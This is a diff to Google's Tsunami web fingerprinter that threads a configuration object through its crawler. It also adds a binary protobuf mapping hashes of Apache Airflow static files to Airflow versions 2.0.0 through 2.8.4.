a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawler.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawler.java @@ -26,6 +26,7 @@ import com.google.common.util.concurrent.ListeningExecutorService; import com.google.tsunami.common.net.http.HttpClient; import com.google.tsunami.common.net.http.HttpMethod; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs; import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlResult; import com.google.tsunami.proto.CrawlTarget; @@ -45,15 +46,18 @@ public final class SimpleCrawler implements Crawler { private final ForkJoinPool forkJoinPool; private final ListeningExecutorService schedulingPool; private final HttpClient httpClient; + private final WebServiceFingerprinterConfigs configs; @Inject SimpleCrawler( @SimpleCrawlerWorkerPool ForkJoinPool forkJoinPool, @SimpleCrawlerSchedulingPool ListeningExecutorService schedulingPool, - HttpClient httpClient) { + HttpClient httpClient, + WebServiceFingerprinterConfigs configs) { this.forkJoinPool = checkNotNull(forkJoinPool); this.schedulingPool = checkNotNull(schedulingPool); this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); + this.configs = checkNotNull(configs); } @Override @@ -76,7 +80,7 @@ private SimpleCrawlAction buildCrawlAction( CrawlConfig crawlConfig, String url, SimpleCrawlerResults crawlerResults) { CrawlTarget crawlTarget = CrawlTarget.newBuilder().setHttpMethod(HttpMethod.GET.toString()).setUrl(url).build(); - return new SimpleCrawlAction(0, httpClient, crawlConfig, crawlTarget, crawlerResults); + return new SimpleCrawlAction(0, httpClient, crawlConfig, crawlTarget, crawlerResults, configs); } private ListenableFuture startCrawlAction( diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/detection/SoftwareDetector.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/detection/SoftwareDetector.java index e0e6741bc..c40a2c4c7 100644 --- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/detection/SoftwareDetector.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/detection/SoftwareDetector.java @@ -240,7 +240,7 @@ public static Builder builder() { /** Builder for {@link DetectedSoftware}. */ @AutoValue.Builder - abstract static class Builder { + public abstract static class Builder { public abstract Builder setSoftwareIdentity(SoftwareIdentity value); public abstract Builder setRootPath(String value); public abstract Builder setContentHashes(ImmutableMap value); diff --git a/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/airflow.binproto b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/airflow.binproto new file mode 100644 index 000000000..1e7d453af --- /dev/null +++ b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/airflow.binproto @@ -0,0 +1,2720 @@ + + +airflow^ +8static/dist/airflowDefaultTheme.c19bf634a906347cf1a0.css" + 7ec48ba6cf8e0da2794eea814716f908X +2static/dist/materialIcons.f9559e4953177b8b9a4a.css" + 6a5cf061713bc440a736368163188d76 +"static/appbuilder/js/ab_filters.js" + 74144ee417aadc310d896041e6587e92" + dcd68d71656b8682d494d45bb1b1d0dd" + f2893426e1d9833d278285d1b4ab6f00" + 814ad04f26a6a78ad0c37349739aa574" + b3ecc15d7dfbea6143d342a262d6ea21" + 9977922fd9659a1d9fde6c7f401daa5b" + a2d1aa28848b92791b1aa38262c55e88[ +5static/appbuilder/datepicker/bootstrap-datepicker.css" + 582d3181dba9c37f7860710244393e8eN +(static/dist/main.d6649b884746315637be.js" + 06c544de1025c42f685b80896dfe615a +%static/appbuilder/js/jquery-latest.js" + d6de181c1ee3791ea45e3fbdf389fe55" + 72a7f671a4f9e51d3256ea9ad9e3514f" + a8222f5cfec7f13c0d4fe26e88b452b0^ +8static/dist/airflowDefaultTheme.fd803ddb438e3d518eb3.css" + 2a36dc5b58c5b05ffb14214d54cb887fN +(static/dist/main.0b3299d0b0db1076c096.js" + 4c585872f4045fb240844f8cd47199e0P +*static/dist/moment.805846635248ee428644.js" + 33531a4d086c6477be55a8820e4ddfb9O +)static/dist/main.c76c4a9850bda3fb5599.css" + 58d2c2ce24439ff4e80e9197751fbbeeN +(static/dist/main.ec58b0ff6b26d248d142.js" + 00b600a312f0d6342ea50bae1061e3f1P +*static/dist/moment.c61e3ab5bc7680097402.js" + 8b2eef2d6a791b1955d27f4728aad10bN +(static/dist/main.9a020ab96cfff52e09fb.js" + 123b48df6cc249acb1a7aaacf50cba6cP +*static/dist/flash.5adc3a4998ff394d2a3e.css" + 61d629a3277f4159129ee6e27c9d25b2V +0static/dist/loadingDots.d58d573e7e3fd22bcfc6.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adP +*static/dist/flash.39f43f5a4fffad4cd720.css" + 8c698c36f86b858e5edbd79bc1e9799cX +2static/dist/materialIcons.542fbb9fa8b5a2ec811b.css" + 6a5cf061713bc440a736368163188d76X +2static/dist/materialIcons.7310810fa0ee22536071.css" + 6a5cf061713bc440a736368163188d76O +)static/dist/main.0b3299d0b0db1076c096.css" + 1f369178e63ecf1c7228ec97acbe9a2bP +*static/appbuilder/css/font-awesome.min.css" + 589e24c189b18e7e92667246936513e1P +*static/dist/flash.7fb10b5a80aea0a37122.css" + 61d629a3277f4159129ee6e27c9d25b2Q ++static/appbuilder/js/select2/select2.min.js" + 383cd3a04454b72cb2ed7baaf3845ebcO +)static/dist/main.7c8f9340325b929761a0.css" + 033045ec62f60a11d68307d0965275ebN +(static/dist/main.255b39340a749864c22a.js" + 1c071388475e5d34319b4b6f456bec60N +(static/dist/main.c76c4a9850bda3fb5599.js" + f16e815edfddb662d578e5e413a9885aX +2static/dist/materialIcons.087c3315826ce743dc8d.css" + 6a5cf061713bc440a736368163188d76X +2static/dist/materialIcons.b5be025c4c658382069b.css" + 6a5cf061713bc440a736368163188d76O +)static/dist/main.e52cf607b64cdcd15089.css" + d3edf253616b51dec9371ba6c8c1946d +'static/dist/bootstrap3-typeahead.min.js" + f86226b966de712b24d1772195fb9482" + 84dda4b845b768f63084be203d54db93" + c55eca542a4598b5f26c8b777852fdedP +*static/dist/flash.82c9e653b17d76b0b572.css" + f25cdcdd43d8f815c82f22ceeadd76aaV +0static/dist/loadingDots.5da42d00b5455806e709.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adq +'static/appbuilder/css/flags/flags16.css" + 163ceda19d640c9636e25216356212ad" + c0ed5753f6e056b261b63ee5c2fb6514n +Hstatic/appbuilder/css/bootstrap-datepicker/bootstrap-datepicker3.min.css" + d91a504980d503f5a97e0f795bc7059eo +%static/appbuilder/select2/select2.css" + e80f0fcf36346801eeda8509dcf54e5a" + 8fc023ad64861b58b154089c33de2065P +*static/dist/moment.c1933ee062e9650051f7.js" + 1daacbf407af4369f7770154d3b0174fO +)static/dist/main.1752c6e8005878f87b5e.css" + 8eb9532b0b9bde86323cc7a21e07c370 +static/appbuilder/css/ab.css" + 01ecf28c115d206c6c14586b074671e5" + b764048d1982806cb753c798853c829d" + fe613a88bf5477073ff5ea9d27c86760P +*static/dist/flash.d2167ed6d99f8d7833ef.css" + f25cdcdd43d8f815c82f22ceeadd76aaO +)static/dist/main.255b39340a749864c22a.css" + aba90e2e1a3f359bf11241ff0983e01b +,static/dist/bootstrap-datetimepicker.min.css" + 290df06b00f38ac4b62000e181566917" + 3862b83990c3ecaaf9b8a8dd45f3fee9" + 1e98719a524ce71c746517645b77aaa5V +0static/dist/loadingDots.37c7fd200eafd0c27df7.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adO +)static/dist/main.7482f675ad7c97dc7702.css" + ad767bf5daa820f1aae5c70f3bfbda0dN +(static/dist/main.527e9326c35043674708.js" + b4abc9bcc7974e25cb7090e05aa88fbe +confirm" + a61ed07273fe3e596ff8cd9a7425bd9c" + 39efa05dd63321d06fddcbd2917019d4" + 573fea78ca5fa359ccb095cfcfa0f916" + 7db6532c8680893f2f8e859c8e705a5e" + 53e33527c5b23bdbe8d8e601a886afc6" + 4d22cef9ed9c93232ebb0ca70eca3a2f" + ab7970dad1bdbaae28dc2fb71d3361daO +)static/dist/main.a02ab09a012af15327d8.css" + 2388345c822d79757b4ab5ee1f39d9c3O +)static/dist/main.6f9728400381098372e3.css" + eda89148bdd5e0a11f99557cc5b0943bO +)static/dist/main.c6ddfe9182894d4d9d8d.css" + a7f630d0a5b4ffed3862498c8ba76592N +(static/dist/main.a53ccbaa4ca384c91837.js" + 6326b461dab6894b1893e0f5ca54f07aP +*static/dist/moment.fad363e66ff398a6fbf3.js" + 1f0b461b6b441e43279fa7e6beeabc50y +/static/appbuilder/css/fontawesome/solid.min.css" + ad372c4e8b277cee9ffb5a342ab9618a" + 04eea7ad3395e96d6bd4a43e64048ac0O +)static/dist/main.4326607f6e6a434600a7.css" + aecfd839bc51ac88c092ac68f7375d20O +)static/dist/main.da956f078ba1725e3daf.css" + 1f369178e63ecf1c7228ec97acbe9a2b +static/appbuilder/js/ab.js" + aad12c6f56d7bb26d7cf25f8ddec911b" + 7832a44c4160360a9d55f1234bc4af03" + 448454a92aefd52c3b8ed1941e669209" + a553cece457b2a592bf58e0416f42171" + c6f68feb31ea40e8d35a1bdbe672f354N +(static/dist/main.795f05be1714e3254570.js" + b8dee7871e22bc45554dbc201885b574k +Estatic/appbuilder/js/bootstrap-datepicker/bootstrap-datepicker.min.js" + ce524b7a84d22eaca558822c6b260687[ +5static/appbuilder/select2/select2-bootstrap-theme.css" + 90a7f3f8ce22fc33ddd2a1101642aa0bP +*static/dist/flash.2b1a873e0aabc828a165.css" + 61d629a3277f4159129ee6e27c9d25b2S +-static/appbuilder/css/select2/select2.min.css" + 6383020b3548e9cfcc82f1bf609a968bP +*static/dist/moment.c42e4c391a00d2899c5c.js" + 43781e44ba946faa49fd925e223d1ce1] +7static/appbuilder/css/select2/select2-bootstrap.min.css" + 90a7f3f8ce22fc33ddd2a1101642aa0b ++static/dist/bootstrap-datetimepicker.min.js" + d078fa2acac80591b63741c6cddf0163" + a6cf07e56ff0fdf9aef4972c82b5916b" + 86c551b382867bf234b7b75fe0c8a74c" + 7b96ade8af36874c83365352e639531d" + cce406db8272fc9dde3737c4350fadd1P +*static/dist/flash.abc94ba72cd821e27f31.css" + 61d629a3277f4159129ee6e27c9d25b2^ +8static/dist/airflowDefaultTheme.3e8bda71892b61b62f94.css" + 315bbe6824f586b49f2b803b067baeb1^ +8static/dist/airflowDefaultTheme.42f8d9f03e53e5b06087.css" + 7ec48ba6cf8e0da2794eea814716f908X +2static/appbuilder/css/fontawesome/v4-shims.min.css" + 5c8823187714a8cc3474782acf989c4aV +0static/dist/loadingDots.4bccfb4c41b26eefcf1c.css" + 6036059bd0d6736469d7678989dde978O +)static/dist/main.d6649b884746315637be.css" + 8eb9532b0b9bde86323cc7a21e07c370Z +4static/appbuilder/datepicker/bootstrap-datepicker.js" + d2c4f7d3876b83145cf4df68ce8a72ecO +)static/dist/main.a53ccbaa4ca384c91837.css" + aba90e2e1a3f359bf11241ff0983e01bN +(static/dist/main.e52cf607b64cdcd15089.js" + 0a703328e9f1bef59839282e04a977a6X +2static/dist/materialIcons.c86800f70eece0ad5c3e.css" + 35462396579d3bda4db6f79eb689d4dbN +(static/dist/main.a02ab09a012af15327d8.js" + 49c428e499aa36fa1d48f7f72bb7fe13P +*static/dist/flash.a58a9322159cd5cd08c3.css" + 8c698c36f86b858e5edbd79bc1e9799c^ +8static/dist/airflowDefaultTheme.c70a0986eb5cd4851faa.css" + 2a36dc5b58c5b05ffb14214d54cb887fP +*static/dist/moment.e5f820b9b99df22a8206.js" + 3336a688f7fa86f866b7af782bd43276V +0static/dist/loadingDots.84963375c34df3f17aab.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adr +(static/dist/main.bde72ea87585ebc44fe9.js" + f974940d669a9198f5183b441e36981b" + 4f79c5e47de4b2211a237034f72c63f3P +*static/dist/flash.d205b61edc54ed448412.css" + 06e544a86c0fc43c89bd1eae320057c7^ +8static/dist/airflowDefaultTheme.731e57571b52cca4350d.css" + 493417b6d552d7505685c925a1370b8e{ +1static/appbuilder/css/fontawesome/regular.min.css" + 8affbd9d23b61f3e78c748cf752d8fab" + e21f1e382dc4d68c4ba647765afb0369O +)static/dist/main.9645e1e98ff7a669aff7.css" + eda89148bdd5e0a11f99557cc5b0943bV +0static/dist/loadingDots.36f1f76c70002f18243a.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adP +*static/dist/flash.e22a7e35f238b0bc744f.css" + 61d629a3277f4159129ee6e27c9d25b2o +%static/appbuilder/js/bootstrap.min.js" + aa01b9bc0b765a8cb32d66b9d92c5bd8" + b856fe5f606651a03887c94843930354^ +8static/dist/airflowDefaultTheme.c93fb34380b84747e945.css" + 35a9e0341e792d4639de43afa32ba78aP +*static/dist/moment.dae03602a1cb62165b62.js" + a0af07dff99838db072173ba2a90c121X +2static/dist/materialIcons.ce0f77d10d4dc51f5f07.css" + 6a5cf061713bc440a736368163188d76N +(static/dist/main.1752c6e8005878f87b5e.js" + 903e1ea197c2e5546fca258dad806048^ +8static/dist/airflowDefaultTheme.9c52407a4b82b6d0a2da.css" + 35a9e0341e792d4639de43afa32ba78a^ +8static/dist/airflowDefaultTheme.d3d1b0809f936a6f2b56.css" + 493417b6d552d7505685c925a1370b8eV +0static/dist/loadingDots.f9d109f104217ec97cea.css" + 6036059bd0d6736469d7678989dde978O +)static/dist/main.bde72ea87585ebc44fe9.css" + 71b19163a59e66e52370342c813621bft +*static/dist/moment.0fcb6b41ff6a87cf079e.js" + a4cf644a6a883f40a1f67fd17bc93017" + 3fdf1bd73e77bdd043a6fbde0700728bV +0static/dist/loadingDots.4033edd9abf2750d6f8f.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adO +)static/dist/main.ec58b0ff6b26d248d142.css" + aecfd839bc51ac88c092ac68f7375d20z +0static/appbuilder/css/fontawesome/brands.min.css" + a8469da629cb1fd1af9ef78e1751d796" + f2df63c28cde1d80b7171ea5c3ea50cel +"static/appbuilder/js/ab_actions.js" + ec4db40dd9287b27e476b3817ade4179" + e47efb285dbeb5153153b7243d0e9642^ +8static/dist/airflowDefaultTheme.ce329611a683ab0c05fd.css" + 315bbe6824f586b49f2b803b067baeb1O +)static/dist/main.9a020ab96cfff52e09fb.css" + ad767bf5daa820f1aae5c70f3bfbda0dN +(static/dist/main.da956f078ba1725e3daf.js" + 8ba30909b8da7afd74489c6d39499138[ +5static/appbuilder/css/fontawesome/fontawesome.min.css" + 5660141a1160968edc60b0767cdd90d0V +0static/dist/loadingDots.1392f729dc9855a280a8.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adP +*static/dist/moment.26f1d838a0f59697623d.js" + 7b2985eb524ff5de6c53acda3b5b7ec4N +(static/dist/main.7c8f9340325b929761a0.js" + 737e69c48900d5757196304061957d7eO +)static/dist/main.527e9326c35043674708.css" + ad767bf5daa820f1aae5c70f3bfbda0dX +2static/dist/materialIcons.4f9d67516ebe00c0bbb6.css" + 35462396579d3bda4db6f79eb689d4dbO +)static/dist/main.559baa8766c31899215b.css" + 256c8bbcf8bae1e2cdbec8ad34191ed9N +(static/dist/main.6f9728400381098372e3.js" + 89368864a978718689f72f1de3ee3bd9X +2static/dist/materialIcons.3221294eb511f43d1b15.css" + 6a5cf061713bc440a736368163188d76P +*static/dist/moment.1a09402fe354380806b9.js" + 818a6ccf142b1f46728ccc79106b30e3P +*static/dist/moment.197a6f3cab42e240f8bd.js" + 4aec2a527a719fcacc739af5c1450129M +'static/appbuilder/css/bootstrap.min.css" + aac3da63f60267eac4ef43812790449dN +(static/dist/main.559baa8766c31899215b.js" + 49c428e499aa36fa1d48f7f72bb7fe13N +(static/dist/main.9645e1e98ff7a669aff7.js" + cac3dc4824469d7cab68a5fb96499758N +(static/dist/main.4326607f6e6a434600a7.js" + 43cf951e92fc308700077fc04bb4d507N +(static/dist/main.c6ddfe9182894d4d9d8d.js" + f16e815edfddb662d578e5e413a9885a^ +8static/dist/airflowDefaultTheme.a27149057fd893ed3d09.css" + 35a9e0341e792d4639de43afa32ba78aP +*static/dist/flash.eb8d441e4edaecf40ce7.css" + 99d6845a3a60e63c8890a4f93182425bn +$static/appbuilder/select2/select2.js" + 6b2af8bd67692deaa981668b25aa4bc4" + 03527a0dc02ecb3dde68e0cc600157c9N +(static/dist/main.7482f675ad7c97dc7702.js" + f6c4565173addd0f0cfab9503bac98fe7 +static/pin_32.png" + 31cf27939eac2ff81538e6514f3500f8O +)static/dist/main.795f05be1714e3254570.css" + ad767bf5daa820f1aae5c70f3bfbda0dX +2static/dist/materialIcons.e5d66b6b5f98c05254bf.css" + 6a5cf061713bc440a736368163188d76Q +" + ce524b7a84d22eaca558822c6b260687 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4 +" + 03527a0dc02ecb3dde68e0cc600157c9 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0? +" + dcd68d71656b8682d494d45bb1b1d0dd +2.7.3 +2.7.2 +2.7.1? +" + 1f369178e63ecf1c7228ec97acbe9a2b +2.3.2 +2.3.1 +2.3.0l +" + 6b2af8bd67692deaa981668b25aa4bc4 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0Q +" + 163ceda19d640c9636e25216356212ad +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4? +" + 8b2eef2d6a791b1955d27f4728aad10b +2.0.2 +2.0.1 +2.0.0Q +" + d91a504980d503f5a97e0f795bc7059e +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.46 +" + 43cf951e92fc308700077fc04bb4d507 +2.5.3 +2.5.2H +" + 06e544a86c0fc43c89bd1eae320057c7 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +" + e47efb285dbeb5153153b7243d0e9642 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0H +" + 6326b461dab6894b1893e0f5ca54f07a +2.4.3 +2.4.2 +2.4.1 +2.4.0H +" + 3fdf1bd73e77bdd043a6fbde0700728b +2.7.3 +2.7.2 +2.7.1 +2.7.0 +" + 8fc023ad64861b58b154089c33de2065 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 +" + 5c8823187714a8cc3474782acf989c4a +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.8.4 +" + c0ed5753f6e056b261b63ee5c2fb6514 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0Q +" + ad372c4e8b277cee9ffb5a342ab9618a +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + 737e69c48900d5757196304061957d7e +2.1.0 +" + aac3da63f60267eac4ef43812790449d +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 +2.8.4c +" + a8222f5cfec7f13c0d4fe26e88b452b0 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 +" + b856fe5f606651a03887c94843930354 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 +" + 582d3181dba9c37f7860710244393e8e +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0Z +" + a553cece457b2a592bf58e0416f42171 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2- +" + b8dee7871e22bc45554dbc201885b574 +2.7.1H +" + 7ec48ba6cf8e0da2794eea814716f908 +2.1.0 +2.0.2 +2.0.1 +2.0.0? +" + 49c428e499aa36fa1d48f7f72bb7fe13 +2.0.2 +2.0.1 +2.0.0 +" + 84dda4b845b768f63084be203d54db93 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +" + fe613a88bf5477073ff5ea9d27c86760 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0- +" + 43781e44ba946faa49fd925e223d1ce1 +2.3.3Q +" + a4cf644a6a883f40a1f67fd17bc93017 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + a0af07dff99838db072173ba2a90c121 +2.3.4u +" + 7b96ade8af36874c83365352e639531d +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2Q +" + d078fa2acac80591b63741c6cddf0163 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + a61ed07273fe3e596ff8cd9a7425bd9c +2.2.5 +" + 35a9e0341e792d4639de43afa32ba78a +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.8.4l +" + f2df63c28cde1d80b7171ea5c3ea50ce +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +" + 61d629a3277f4159129ee6e27c9d25b2 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0Q +" + aa01b9bc0b765a8cb32d66b9d92c5bd8 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4Q +" + 8affbd9d23b61f3e78c748cf752d8fab +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4Q +" + f86226b966de712b24d1772195fb9482 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + 3862b83990c3ecaaf9b8a8dd45f3fee9 +2.1.1l +" + b764048d1982806cb753c798853c829d +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.06 +" + 8eb9532b0b9bde86323cc7a21e07c370 +2.3.4 +2.3.3Q +" + a8469da629cb1fd1af9ef78e1751d796 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + 573fea78ca5fa359ccb095cfcfa0f916 +2.2.3- +" + 4d22cef9ed9c93232ebb0ca70eca3a2f +2.2.0 +" + 86c551b382867bf234b7b75fe0c8a74c +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3Q +" + 9977922fd9659a1d9fde6c7f401daa5b +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4- +" + 00b600a312f0d6342ea50bae1061e3f1 +2.5.1Q +" + 383cd3a04454b72cb2ed7baaf3845ebc +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4 +" + 72a7f671a4f9e51d3256ea9ad9e3514f +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4Q +" + cce406db8272fc9dde3737c4350fadd1 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0H +" + f25cdcdd43d8f815c82f22ceeadd76aa +2.1.0 +2.0.2 +2.0.1 +2.0.0- +" + 53e33527c5b23bdbe8d8e601a886afc6 +2.2.1- +" + 06c544de1025c42f685b80896dfe615a +2.3.3c +" + a2d1aa28848b92791b1aa38262c55e88 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0Q +" + aad12c6f56d7bb26d7cf25f8ddec911b +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4 +" + b3ecc15d7dfbea6143d342a262d6ea21 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.46 +" + a7f630d0a5b4ffed3862498c8ba76592 +2.2.1 +2.2.0l +" + e21f1e382dc4d68c4ba647765afb0369 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +" + c55eca542a4598b5f26c8b777852fded +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0Q +" + 74144ee417aadc310d896041e6587e92 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4c +" + a6cf07e56ff0fdf9aef4972c82b5916b +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.3.2 +2.3.1 +2.3.0H +" + 35462396579d3bda4db6f79eb689d4db +2.1.0 +2.0.2 +2.0.1 +2.0.0Q +" + d6de181c1ee3791ea45e3fbdf389fe55 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4Q +" + aba90e2e1a3f359bf11241ff0983e01b +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0Q +" + 01ecf28c115d206c6c14586b074671e5 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4l +" + e80f0fcf36346801eeda8509dcf54e5a +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0? +" + aecfd839bc51ac88c092ac68f7375d20 +2.5.3 +2.5.2 +2.5.1 +" + 290df06b00f38ac4b62000e181566917 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.8.4- +" + 903e1ea197c2e5546fca258dad806048 +2.3.4- +" + 7db6532c8680893f2f8e859c8e705a5e +2.2.2 +" + 31cf27939eac2ff81538e6514f3500f8 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 